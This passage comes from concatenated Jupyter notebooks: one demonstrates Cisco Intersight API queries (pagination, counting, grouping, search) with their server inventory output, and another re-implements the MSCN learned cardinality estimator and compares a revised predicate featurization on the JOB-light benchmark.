Model: UCSB-B480-M5 Serial: SRV125 NumThreads: 32 3 of 3 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 NumThreads: 16 ###Markdown --- Pagination, skip the top N results only ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$skip=3' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial', 'NumThreads' ] ) ###Output HTTP response: 200 OK Objects returned: 15 1 of 15 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: 16 2 of 15 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 NumThreads: 16 3 
of 15 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: 16 4 of 15 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: 16 5 of 15 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: 16 6 of 15 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 NumThreads: 16 7 of 15 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 NumThreads: 16 8 of 15 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: 16 9 of 15 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: 16 10 of 15 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 NumThreads: 32 11 of 15 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: 16 12 of 15 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 NumThreads: 16 13 of 15 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: 16 14 of 15 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 NumThreads: 16 15 of 15 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 NumThreads: 16 ###Markdown --- Pagination, skip the first N results and return only the top X remaining results ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$skip=3&$top=5' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial', 'NumThreads' ] ) ###Output HTTP response: 200 OK Objects returned: 5 1 of 5 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: 16 2 of 5 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 NumThreads: 16 3 of 5 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: 16 4 of 5 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: 16 5 of 5 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: 16 ###Markdown --- Return objects in a certain order (select only certain properties) ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$orderby=Serial&$select=Dn,Serial,Model' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial' ] ) ###Output HTTP response: 200 OK Objects returned: 18 1 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 2 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 3 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 4 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 5 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 6 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 7 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 8 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 9 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 10 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 11 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 12 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 13 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 14 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 15 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 16 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 17 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 18 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 ###Markdown --- Return only a count of the matching objects, no objects or 
their properties ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$count=true' ) # Display the results print(f'Total matching objects: {results.get("Count")}') ###Output HTTP response: 200 OK Objects returned: 1 Total matching objects: 18 ###Markdown --- Return a count of matching objects with objects and their properties ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$inlinecount=allpages&$select=Dn,Model,Serial' ) # Display the results print(f'Total matching objects: {results.get("Count")}\n') display_results( results=results, fields=[ 'Model', 'Serial', 'NumThreads' ] ) ###Output HTTP response: 200 OK Objects returned: 18 Total matching objects: 18 1 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 NumThreads: N/A 2 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 NumThreads: N/A 3 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 NumThreads: N/A 4 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: N/A 5 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 NumThreads: N/A 6 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: N/A 7 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: N/A 8 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: N/A 9 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 NumThreads: N/A 10 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 NumThreads: N/A 11 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: N/A 12 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: N/A 13 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 NumThreads: N/A 14 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: N/A 15 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 NumThreads: N/A 16 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: N/A 17 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 NumThreads: N/A 18 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 NumThreads: N/A ###Markdown --- Group objects by properties and aggregate results by values- Group all servers by Model and display the average number of CPUs per model.- Supported aggregates include: - min, max, average, and sum ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$apply=groupby((Model), aggregate(NumCpus with average as AverageCpuCount))' ) # Display the results display_results( results=results, fields=[ 'Model', 'AverageCpuCount' ] ) ###Output HTTP response: 200 OK Objects returned: 4 1 of 4 DN: N/A Model: UCSB-B200-M5 AverageCpuCount: 2 2 of 4 DN: N/A Model: UCSB-B480-M5 AverageCpuCount: 4 3 of 4 DN: N/A Model: UCSB-EX-M4-1 AverageCpuCount: 2 4 of 4 DN: N/A Model: UCSC-C3K-M4SRB AverageCpuCount: 2 ###Markdown --- Group objects by the total count of a value- Group all servers by Model and display the total number of servers for each Model. 
###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$apply=groupby((Model), aggregate($count as TotalCountOfServerModel))' ) display_results( results=results, fields=[ 'Model', 'TotalCountOfServerModel' ] ) ###Output HTTP response: 200 OK Objects returned: 4 1 of 4 DN: N/A Model: UCSC-C3K-M4SRB TotalCountOfServerModel: 4 2 of 4 DN: N/A Model: UCSB-EX-M4-1 TotalCountOfServerModel: 8 3 of 4 DN: N/A Model: UCSB-B480-M5 TotalCountOfServerModel: 2 4 of 4 DN: N/A Model: UCSB-B200-M5 TotalCountOfServerModel: 4 ###Markdown --- Sort grouped objects with the `$orderby` parameter (using the `desc` keyword as an example)- Group all servers by Model and display the total number of servers for each Model. ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$apply=groupby((Model), aggregate($count as TotalCountOfServerModel))&$orderby=TotalCountOfServerModel desc' ) # Display the results display_results( results=results, fields=[ 'Model', 'TotalCountOfServerModel' ] ) ###Output HTTP response: 200 OK Objects returned: 4 1 of 4 DN: N/A Model: UCSB-EX-M4-1 TotalCountOfServerModel: 8 2 of 4 DN: N/A Model: UCSB-B200-M5 TotalCountOfServerModel: 4 3 of 4 DN: N/A Model: UCSC-C3K-M4SRB TotalCountOfServerModel: 4 4 of 4 DN: N/A Model: UCSB-B480-M5 TotalCountOfServerModel: 2 ###Markdown --- Include related resources with the queried resources ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$expand=Parent' ) # Display the results result_sample = results.get('Results')[0] print(f'Dn: {result_sample["Dn"]}') print(f'Parent Dn: {result_sample["Parent"].get("Dn")}') ###Output HTTP response: 200 OK Objects returned: 18 Dn: sys/chassis-5/blade-1 Parent Dn: sys/chassis-5 ###Markdown --- Search for resources- Allows the use of `$top`, `$skip`, `$orderby`, `$filter`, `$select`, & `$count` ###Code results = intersight( method='GET', endpoint='/search/SearchItems', # Single quotes required on the search string # Outer double quotes will work also, without escaping inner single quotes params='$filter=endswith(Dn,\'5\')' ) # Display the results display_results( results=results, fields=[ 'ObjectType', 'EpDn', 'Serial', 'TotalMemory' ] ) ###Output HTTP response: 200 OK Objects returned: 50 1 of 50 DN: sys/chassis-3/blade-5 ObjectType: compute.PhysicalSummary EpDn: N/A Serial: SRV126 TotalMemory: 49152 2 of 50 DN: sys/rack-unit-5 ObjectType: compute.PhysicalSummary EpDn: N/A Serial: RK58 TotalMemory: 49152 3 of 50 DN: sys/rack-unit-5 ObjectType: compute.RackUnit EpDn: N/A Serial: RK58 TotalMemory: 49152 4 of 50 DN: sys/chassis-3/blade-5 ObjectType: compute.Blade EpDn: N/A Serial: SRV126 TotalMemory: 49152 5 of 50 DN: sys/chassis-3/blade-3/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-3/fabric-B/pc-1287 Serial: N/A TotalMemory: N/A 6 of 50 DN: sys/chassis-5/blade-1/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-1/fabric-B/pc-1305 Serial: N/A TotalMemory: N/A 7 of 50 DN: sys/chassis-3/blade-7/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-7/fabric-B/pc-1284 Serial: N/A TotalMemory: N/A 8 of 50 DN: sys/chassis-5/blade-3/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-3/fabric-B/pc-1308 Serial: N/A TotalMemory: N/A 9 of 50 DN: sys/chassis-5/blade-1/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-1/fabric-B/pc-1304 Serial: N/A TotalMemory: N/A 10 of 50 DN: 
sys/chassis-5/blade-2/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-2/fabric-B/pc-1301 Serial: N/A TotalMemory: N/A 11 of 50 DN: sys/chassis-5/blade-2/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-2/fabric-B/pc-1300 Serial: N/A TotalMemory: N/A 12 of 50 DN: sys/chassis-3/blade-1/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-1/fabric-B/pc-1293 Serial: N/A TotalMemory: N/A 13 of 50 DN: sys/chassis-3/blade-5/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-5/fabric-B/pc-1280 Serial: N/A TotalMemory: N/A 14 of 50 DN: sys/chassis-5/blade-3/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-3/fabric-B/pc-1309 Serial: N/A TotalMemory: N/A 15 of 50 DN: sys/chassis-3/blade-3/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-3/fabric-B/pc-1288 Serial: N/A TotalMemory: N/A 16 of 50 DN: sys/chassis-3/blade-5/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-5/fabric-B/pc-1281 Serial: N/A TotalMemory: N/A 17 of 50 DN: sys/chassis-3/blade-1/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-1/fabric-B/pc-1292 Serial: N/A TotalMemory: N/A 18 of 50 DN: sys/rack-unit-5 ObjectType: compute.PhysicalSummary EpDn: N/A Serial: RK58 TotalMemory: 49152 19 of 50 DN: sys/rack-unit-5 ObjectType: compute.RackUnit EpDn: N/A Serial: RK58 TotalMemory: 49152 20 of 50 DN: sys/chassis-3/blade-5 ObjectType: compute.PhysicalSummary EpDn: N/A Serial: SRV126 TotalMemory: 49152 21 of 50 DN: sys/chassis-5 ObjectType: equipment.Chassis EpDn: N/A Serial: CH42 TotalMemory: N/A 22 of 50 DN: sys/chassis-3/blade-5 ObjectType: compute.Blade EpDn: N/A Serial: SRV126 TotalMemory: 49152 23 of 50 DN: sys/chassis-4/enc-1/disk-25 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK694 TotalMemory: N/A 24 of 50 DN: sys/chassis-4/enc-1/disk-5 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK674 TotalMemory: N/A 25 of 50 DN: sys/chassis-4/enc-1/disk-35 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK704 TotalMemory: N/A 26 of 50 DN: sys/chassis-4/enc-1/disk-15 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK684 TotalMemory: N/A 27 of 50 DN: sys/chassis-4/enc-1/disk-45 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK714 TotalMemory: N/A 28 of 50 DN: sys/chassis-4/enc-1/disk-55 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK724 TotalMemory: N/A 29 of 50 DN: sys/rack-unit-9/board/storage-SAS-1/disk-5 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: RKDISK476 TotalMemory: N/A 30 of 50 DN: sys/rack-unit-10/board/storage-SAS-1/disk-5 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: RKDISK493 TotalMemory: N/A 31 of 50 DN: sys/rack-unit-6/equipped-slot-5 ObjectType: pci.Device EpDn: N/A Serial: RKCTLR79 TotalMemory: N/A 32 of 50 DN: sys/rack-unit-7/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 33 of 50 DN: sys/rack-unit-3/board/memarray-1/mem-45 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 34 of 50 DN: sys/chassis-4/blade-1/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2465 TotalMemory: N/A 35 of 50 DN: sys/chassis-4/blade-2/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2481 TotalMemory: N/A 36 of 50 DN: sys/rack-unit-3/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 37 of 50 DN: 
sys/rack-unit-3/board/memarray-1/mem-25 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 38 of 50 DN: sys/rack-unit-4/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 39 of 50 DN: sys/rack-unit-2/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 40 of 50 DN: sys/chassis-3/blade-3/board/memarray-1/mem-25 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2347 TotalMemory: N/A 41 of 50 DN: sys/rack-unit-10/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 42 of 50 DN: sys/chassis-3/blade-3/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2337 TotalMemory: N/A 43 of 50 DN: sys/chassis-5/blade-3/board/memarray-1/mem-45 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2787 TotalMemory: N/A 44 of 50 DN: sys/rack-unit-6/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: RKMEM1889 TotalMemory: N/A 45 of 50 DN: sys/rack-unit-8/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 46 of 50 DN: sys/rack-unit-3/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 47 of 50 DN: sys/chassis-5/blade-3/board/memarray-1/mem-35 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2777 TotalMemory: N/A 48 of 50 DN: sys/chassis-4/blade-1/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2455 TotalMemory: N/A 49 of 50 DN: sys/rack-unit-4/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 50 of 50 DN: sys/rack-unit-10/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A
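###Markdown --- Combine query parameters The operators above compose in a single request. A minimal sketch, reusing the `intersight` helper and the `display_results` function defined earlier:
###Code
results = intersight(
    method='GET',
    endpoint='/compute/Blades',
    # Filter, project, sort, and page in one query string
    params="$filter=contains(Model, 'M5')&$select=Dn,Model,Serial&$orderby=Serial&$top=5"
)

# Display the results
display_results(
    results=results,
    fields=[
        'Model',
        'Serial'
    ]
)
###Output
_____no_output_____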
notebooks/3-Cardinality_Models.ipynb
###Markdown 3 - Overcoming SOTA Performance On IMDB With JOB-Light *By Marcus Schwarting and Andronicus Samsundar Rajasukumar* In this notebook, we will: - Introduce the Kipf et al. model that we wish to improve upon - Show various implementations of featurization routines, and discuss their pros and cons - Discuss changes to the Kipf implementation that yielded overall improvements in accuracy and training time The performance benchmark that we wish to beat, as reported in the literature for the JOB-light test query set on the IMDB dataset, is as follows (all values are Q-errors, i.e. the factor max(estimate/truth, truth/estimate) by which an estimated cardinality deviates from the true one): | Metric | Value || ---- | ---- ||Median | 3.82||90th Percentile| 78.4||95th Percentile|362||Max|1110||Mean|57.9| ###Code #MODIFIED VERSION OF KIPF ET AL CODE (originally from https://github.com/andreaskipf/learnedcardinalities)# import time import os import torch from torch.autograd import Variable from torch.utils.data import DataLoader from mscn.util import * from mscn.data import get_train_datasets, load_data, make_dataset from mscn.model import SetConv ###Output _____no_output_____ ###Markdown Introducing the Kipf MSCN Model The authors achieve the above benchmark performance by using a multi-set convolutional network (MSCN). We have re-implemented their methods with some changes that have marginally improved on the state of the art. Below we re-use some of their code infrastructure and point out important changes where they are applicable. ###Code def unnormalize_torch(vals, min_val, max_val): #Read from "imdb_max_min.csv" vals = (vals * (max_val - min_val)) + min_val return torch.exp(vals) def qerror_loss(preds, targets, min_val, max_val): #Returns Q-error, can also return MAE as desired. qerror = [] preds = unnormalize_torch(preds, min_val, max_val) targets = unnormalize_torch(targets, min_val, max_val) for i in range(len(targets)): if (preds[i] > targets[i]).cpu().data.numpy()[0]: qerror.append(preds[i] / targets[i]) else: qerror.append(targets[i] / preds[i]) return torch.mean(torch.cat(qerror)) def predict(model, data_loader): #The workhorse. Evaluates the final model and runs predictions. preds = [] t_total = 0. 
model.eval() for batch_idx, data_batch in enumerate(data_loader): samples, predicates, joins, targets, sample_masks, predicate_masks, join_masks = data_batch t = time.time() outputs = model(samples, predicates, joins, sample_masks, predicate_masks, join_masks) t_total += time.time() - t for i in range(outputs.data.shape[0]): preds.append(outputs.data[i]) return preds, t_total def print_qerror(preds_unnorm, labels_unnorm): qerror = [] for i in range(len(preds_unnorm)): if preds_unnorm[i] > float(labels_unnorm[i]): qerror.append(preds_unnorm[i] / float(labels_unnorm[i])) else: qerror.append(float(labels_unnorm[i]) / float(preds_unnorm[i])) print(f"Median: {np.median(qerror)}") print(f"90th percentile: {np.percentile(qerror, 90)}") print(f"95th percentile: {np.percentile(qerror, 95)}") print(f"99th percentile: {np.percentile(qerror, 99)}") print(f"Max: {np.max(qerror)}") print(f"Mean: {np.mean(qerror)}") def train_and_predict(workload_name, num_queries=1000, num_epochs=100, \ batch_size=100, hid_units=256, verbose=False,write=False): # Load training and validation data num_materialized_samples = 1000 dicts, column_min_max_vals, min_val, max_val, labels_train, \ labels_test, max_num_joins, max_num_predicates, \ train_data, test_data = get_train_datasets('all_train_queries.sql', num_queries, \ num_materialized_samples) table2vec, column2vec, op2vec, join2vec = dicts # Train model sample_feats = len(table2vec) + num_materialized_samples predicate_feats = len(column2vec) + len(op2vec) + 1 join_feats = len(join2vec) model = SetConv(sample_feats, predicate_feats, join_feats, hid_units) optimizer = torch.optim.Adam(model.parameters(), lr=0.005) #lr=0.001 originally train_data_loader = DataLoader(train_data, batch_size=batch_size) test_data_loader = DataLoader(test_data, batch_size=batch_size) model.train() for epoch in range(num_epochs): loss_total = 0. 
for batch_idx, data_batch in enumerate(train_data_loader): samples, predicates, joins, targets, sample_masks, predicate_masks, join_masks = data_batch optimizer.zero_grad() outputs = model(samples, predicates, joins, sample_masks, predicate_masks, join_masks) loss = qerror_loss(outputs, targets.float(), min_val, max_val) loss_total += loss.item() loss.backward() optimizer.step() if verbose: print("Epoch {}, loss: {}".format(epoch, loss_total / len(train_data_loader))) # Get final training and validation set predictions preds_train, t_total = predict(model, train_data_loader) if verbose: print("Prediction time per training sample: {}".format(t_total / len(labels_train) * 1000)) preds_test, t_total = predict(model, test_data_loader) if verbose: print("Prediction time per validation sample: {}".format(t_total / len(labels_test) * 1000)) # Unnormalize preds_train_unnorm = unnormalize_labels(preds_train, min_val, max_val) labels_train_unnorm = unnormalize_labels(labels_train, min_val, max_val) preds_test_unnorm = unnormalize_labels(preds_test, min_val, max_val) labels_test_unnorm = unnormalize_labels(labels_test, min_val, max_val) # Print metrics if verbose: print("\nQ-Error training set:") print_qerror(preds_train_unnorm, labels_train_unnorm) print("\nQ-Error validation set:") print_qerror(preds_test_unnorm, labels_test_unnorm) print("") # Load test data file_name = "workloads/" + workload_name joins, predicates, tables, samples, label = load_data(file_name, num_materialized_samples) # Get feature encoding and proper normalization samples_test = encode_samples(tables, samples, table2vec) predicates_test, joins_test = encode_data(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec) labels_test, _, _ = normalize_labels(label, min_val, max_val) if verbose: print(f"Number of test samples: {len(labels_test)}") max_num_predicates = max([len(p) for p in predicates_test]) max_num_joins = max([len(j) for j in joins_test]) # Get test set predictions test_data = make_dataset(samples_test, predicates_test, joins_test, labels_test, max_num_joins, max_num_predicates) test_data_loader = DataLoader(test_data, batch_size=batch_size) preds_test, t_total = predict(model, test_data_loader) if verbose: print(f"Prediction time per test sample: {t_total / len(labels_test) * 1000}") # Unnormalize preds_test_unnorm = unnormalize_labels(preds_test, min_val, max_val) # Print metrics print(f"\nQ-Error, {workload_name}:") print_qerror(preds_test_unnorm, label) # Write predictions if write: file_name = f"results/predictions_{workload_name}.csv" os.makedirs(os.path.dirname(file_name), exist_ok=True) with open(file_name, "w") as f: for i in range(len(preds_test_unnorm)): f.write(f'{preds_test_unnorm[i]},{label[i]}\n') print('Original (recreated and retrained) MSCN from Kipf et al.:\n') start_time = time.time() train_and_predict('job-light', num_queries=5000, num_epochs=1000, batch_size=100, hid_units=256) print(f'Total Time: {round((time.time()-start_time),4)} seconds') ###Output Original (recreated and retrained) MSCN from Kipf et al.: Q-Error, job-light: Median: 3.829080001743435 90th percentile: 79.58870873669316 95th percentile: 381.1589145561346 99th percentile: 937.5885201549474 Max: 1271.7475329481463 Mean: 44.07001456032248 Total Time: 217.4167 seconds ###Markdown Adjusted Data Encoding Below is the difference between the original MSCN implementation of predicate data encoding and our featurized predicate encoding. 
###Code #### THE ORIGINAL CODE IS AVAILABLE FROM KIPF ET AL, mscn/utils.py #### def encode_data(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec): predicates_enc = [] joins_enc = [] for i, query in enumerate(predicates): predicates_enc.append(list()) joins_enc.append(list()) for predicate in query: if len(predicate) == 3: # Proper predicate column = predicate[0] operator = predicate[1] val = predicate[2] norm_val = normalize_data(val, column, column_min_max_vals) pred_vec = [] pred_vec.append(column2vec[column]) pred_vec.append(op2vec[operator]) pred_vec.append(norm_val) pred_vec = np.hstack(pred_vec) else: pred_vec = np.zeros((len(column2vec) + len(op2vec) + 1)) predicates_enc[i].append(pred_vec) for predicate in joins[i]: # Join instruction join_vec = join2vec[predicate] joins_enc[i].append(join_vec) return predicates_enc, joins_enc #### OUR UPDATES TO KIPF ET AL DATA ENCODING SCHEMA #### def encode_data_NEW(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec): predicates_enc = [] joins_enc = [] for i, query in enumerate(predicates): predicates_enc.append(list()) joins_enc.append(list()) for predicate in query: column = predicate[0] operator = predicate[1] val = predicate[2] norm_val = normalize_data(val, column, column_min_max_vals) #MAJOR FEATURIZATION CHANGES HERE: one slot per (column, operator) pair col_onehot = column2vec[column] oper_onehot = op2vec[operator] pred_vec = np.zeros(len(col_onehot)*len(oper_onehot)) for j in range(len(col_onehot)): if col_onehot[j] == 1: pred_vec[j*len(oper_onehot):(j+1)*len(oper_onehot)] = oper_onehot*norm_val predicates_enc[i].append(pred_vec) for predicate in joins[i]: # Join instruction join_vec = join2vec[predicate] joins_enc[i].append(join_vec) return predicates_enc, joins_enc ###Output _____no_output_____ ###Markdown Predicate Encoding Scheme Comparison Our main insight on improving the featurization is as follows. Suppose we have a query with the following predicates: $$(b<0.5) \wedge (d>0.2) \wedge (e=0.3)$$ on some set of attributes $\{a,b,c,d,e\}$, where we assume each normalized attribute ranges over $[0,1]$. Assuming an upward limit of four predicates, the Kipf implementation would featurize this predicate set as follows: ``` (Predicate on b) [0 1 0 0 0 1 0 0 0.5] a b c d e < > = val -- AND -- (Predicate on d) [0 0 0 1 0 0 1 0 0.2] a b c d e < > = val -- AND -- (Predicate on e) [0 0 0 0 1 0 0 1 0.3] a b c d e < > = val FINAL REPRESENTATION (assuming a four predicate maximum): [0 1 0 0 0 1 0 0 0.5 0 0 0 1 0 0 1 0 0.2 0 0 0 0 1 0 0 1 0.3 0 0 0 0 0 0 0 0 0] Final Length of Predicate Featurization: 36 (average of 7.2 values per table attribute) ``` By contrast, we choose to featurize this predicate set as follows: ``` [0 0 0 0.5 0 0 0 0 0 0 0.2 0 0 0 0.3] Final Featurization <>= <>= <>= <>= <>= Operators (<, >, =) a b c d e Variables FINAL REPRESENTATION: [0 0 0 0.5 0 0 0 0 0 0 0.2 0 0 0 0.3] Final Length of Predicate Featurization: 15 (constant 3 values per table attribute) ``` There are a number of benefits to this featurization. First, there is no upward limit on the number of predicates that can be placed in a query: the predicate featurization length has no dependence on the number of predicates in a query. 
There is also no order dependence; that is, presumably $$[\color{green}{\text{0, 1, 0, 0, 0, 1, 0, 0, 0.5,}} \color{red}{\text{0, 0, 0, 1, 0, 0, 1, 0, 0.2,}} 0, 0, 0, 0, 1, 0, 0, 1, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0]$$ and $$[ \color{red}{\text{0, 0, 0, 1, 0, 0, 1, 0, 0.2,}} \color{green}{\text{0, 1, 0, 0, 0, 1, 0, 0, 0.5,}} 0, 0, 0, 0, 1, 0, 0, 1, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0]$$ should map to an identical cardinality, and are indeed identical queries (we have merely switched the order of the predicates), but they have very different featurized predicate representations under the original scheme. It would appear that the MSCN is not flexible enough to recognize this equivalence. Even when aggregating over sets of predicates (as the MSCN can be adjusted to do), the improved predicate featurization still outperforms the previous implementation. ###Code print('Retrained MSCN Architecture with Updated Featurization:\n') start_time = time.time() # Note: we use this altered function on the back end with the other utils, and integrate accordingly. train_and_predict_NEW(testset='job-light', num_queries=5000, epochs=1000, batch_size=100, hid=256) print(f'Total Time: {round((time.time()-start_time),4)} seconds') ###Output Retrained MSCN Architecture with Updated Featurization: Q-Error job-light: Median: 3.3707934686744982 90th percentile: 44.26868661918655 95th percentile: 197.39683996127513 99th percentile: 782.6566606666486 Max: 954.0733123971569 Mean: 41.41337581462835 Total Time: 210.5493 seconds
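For reference, the q-error reported above is the symmetric relative error standard in cardinality-estimation work: it is at least 1, and penalizes over- and underestimation equally. A minimal sketch of how `print_qerror` might compute these statistics is below; the function name and the percentile set are taken from the calls above, but the body is our assumption rather than a verbatim copy of the repository code.

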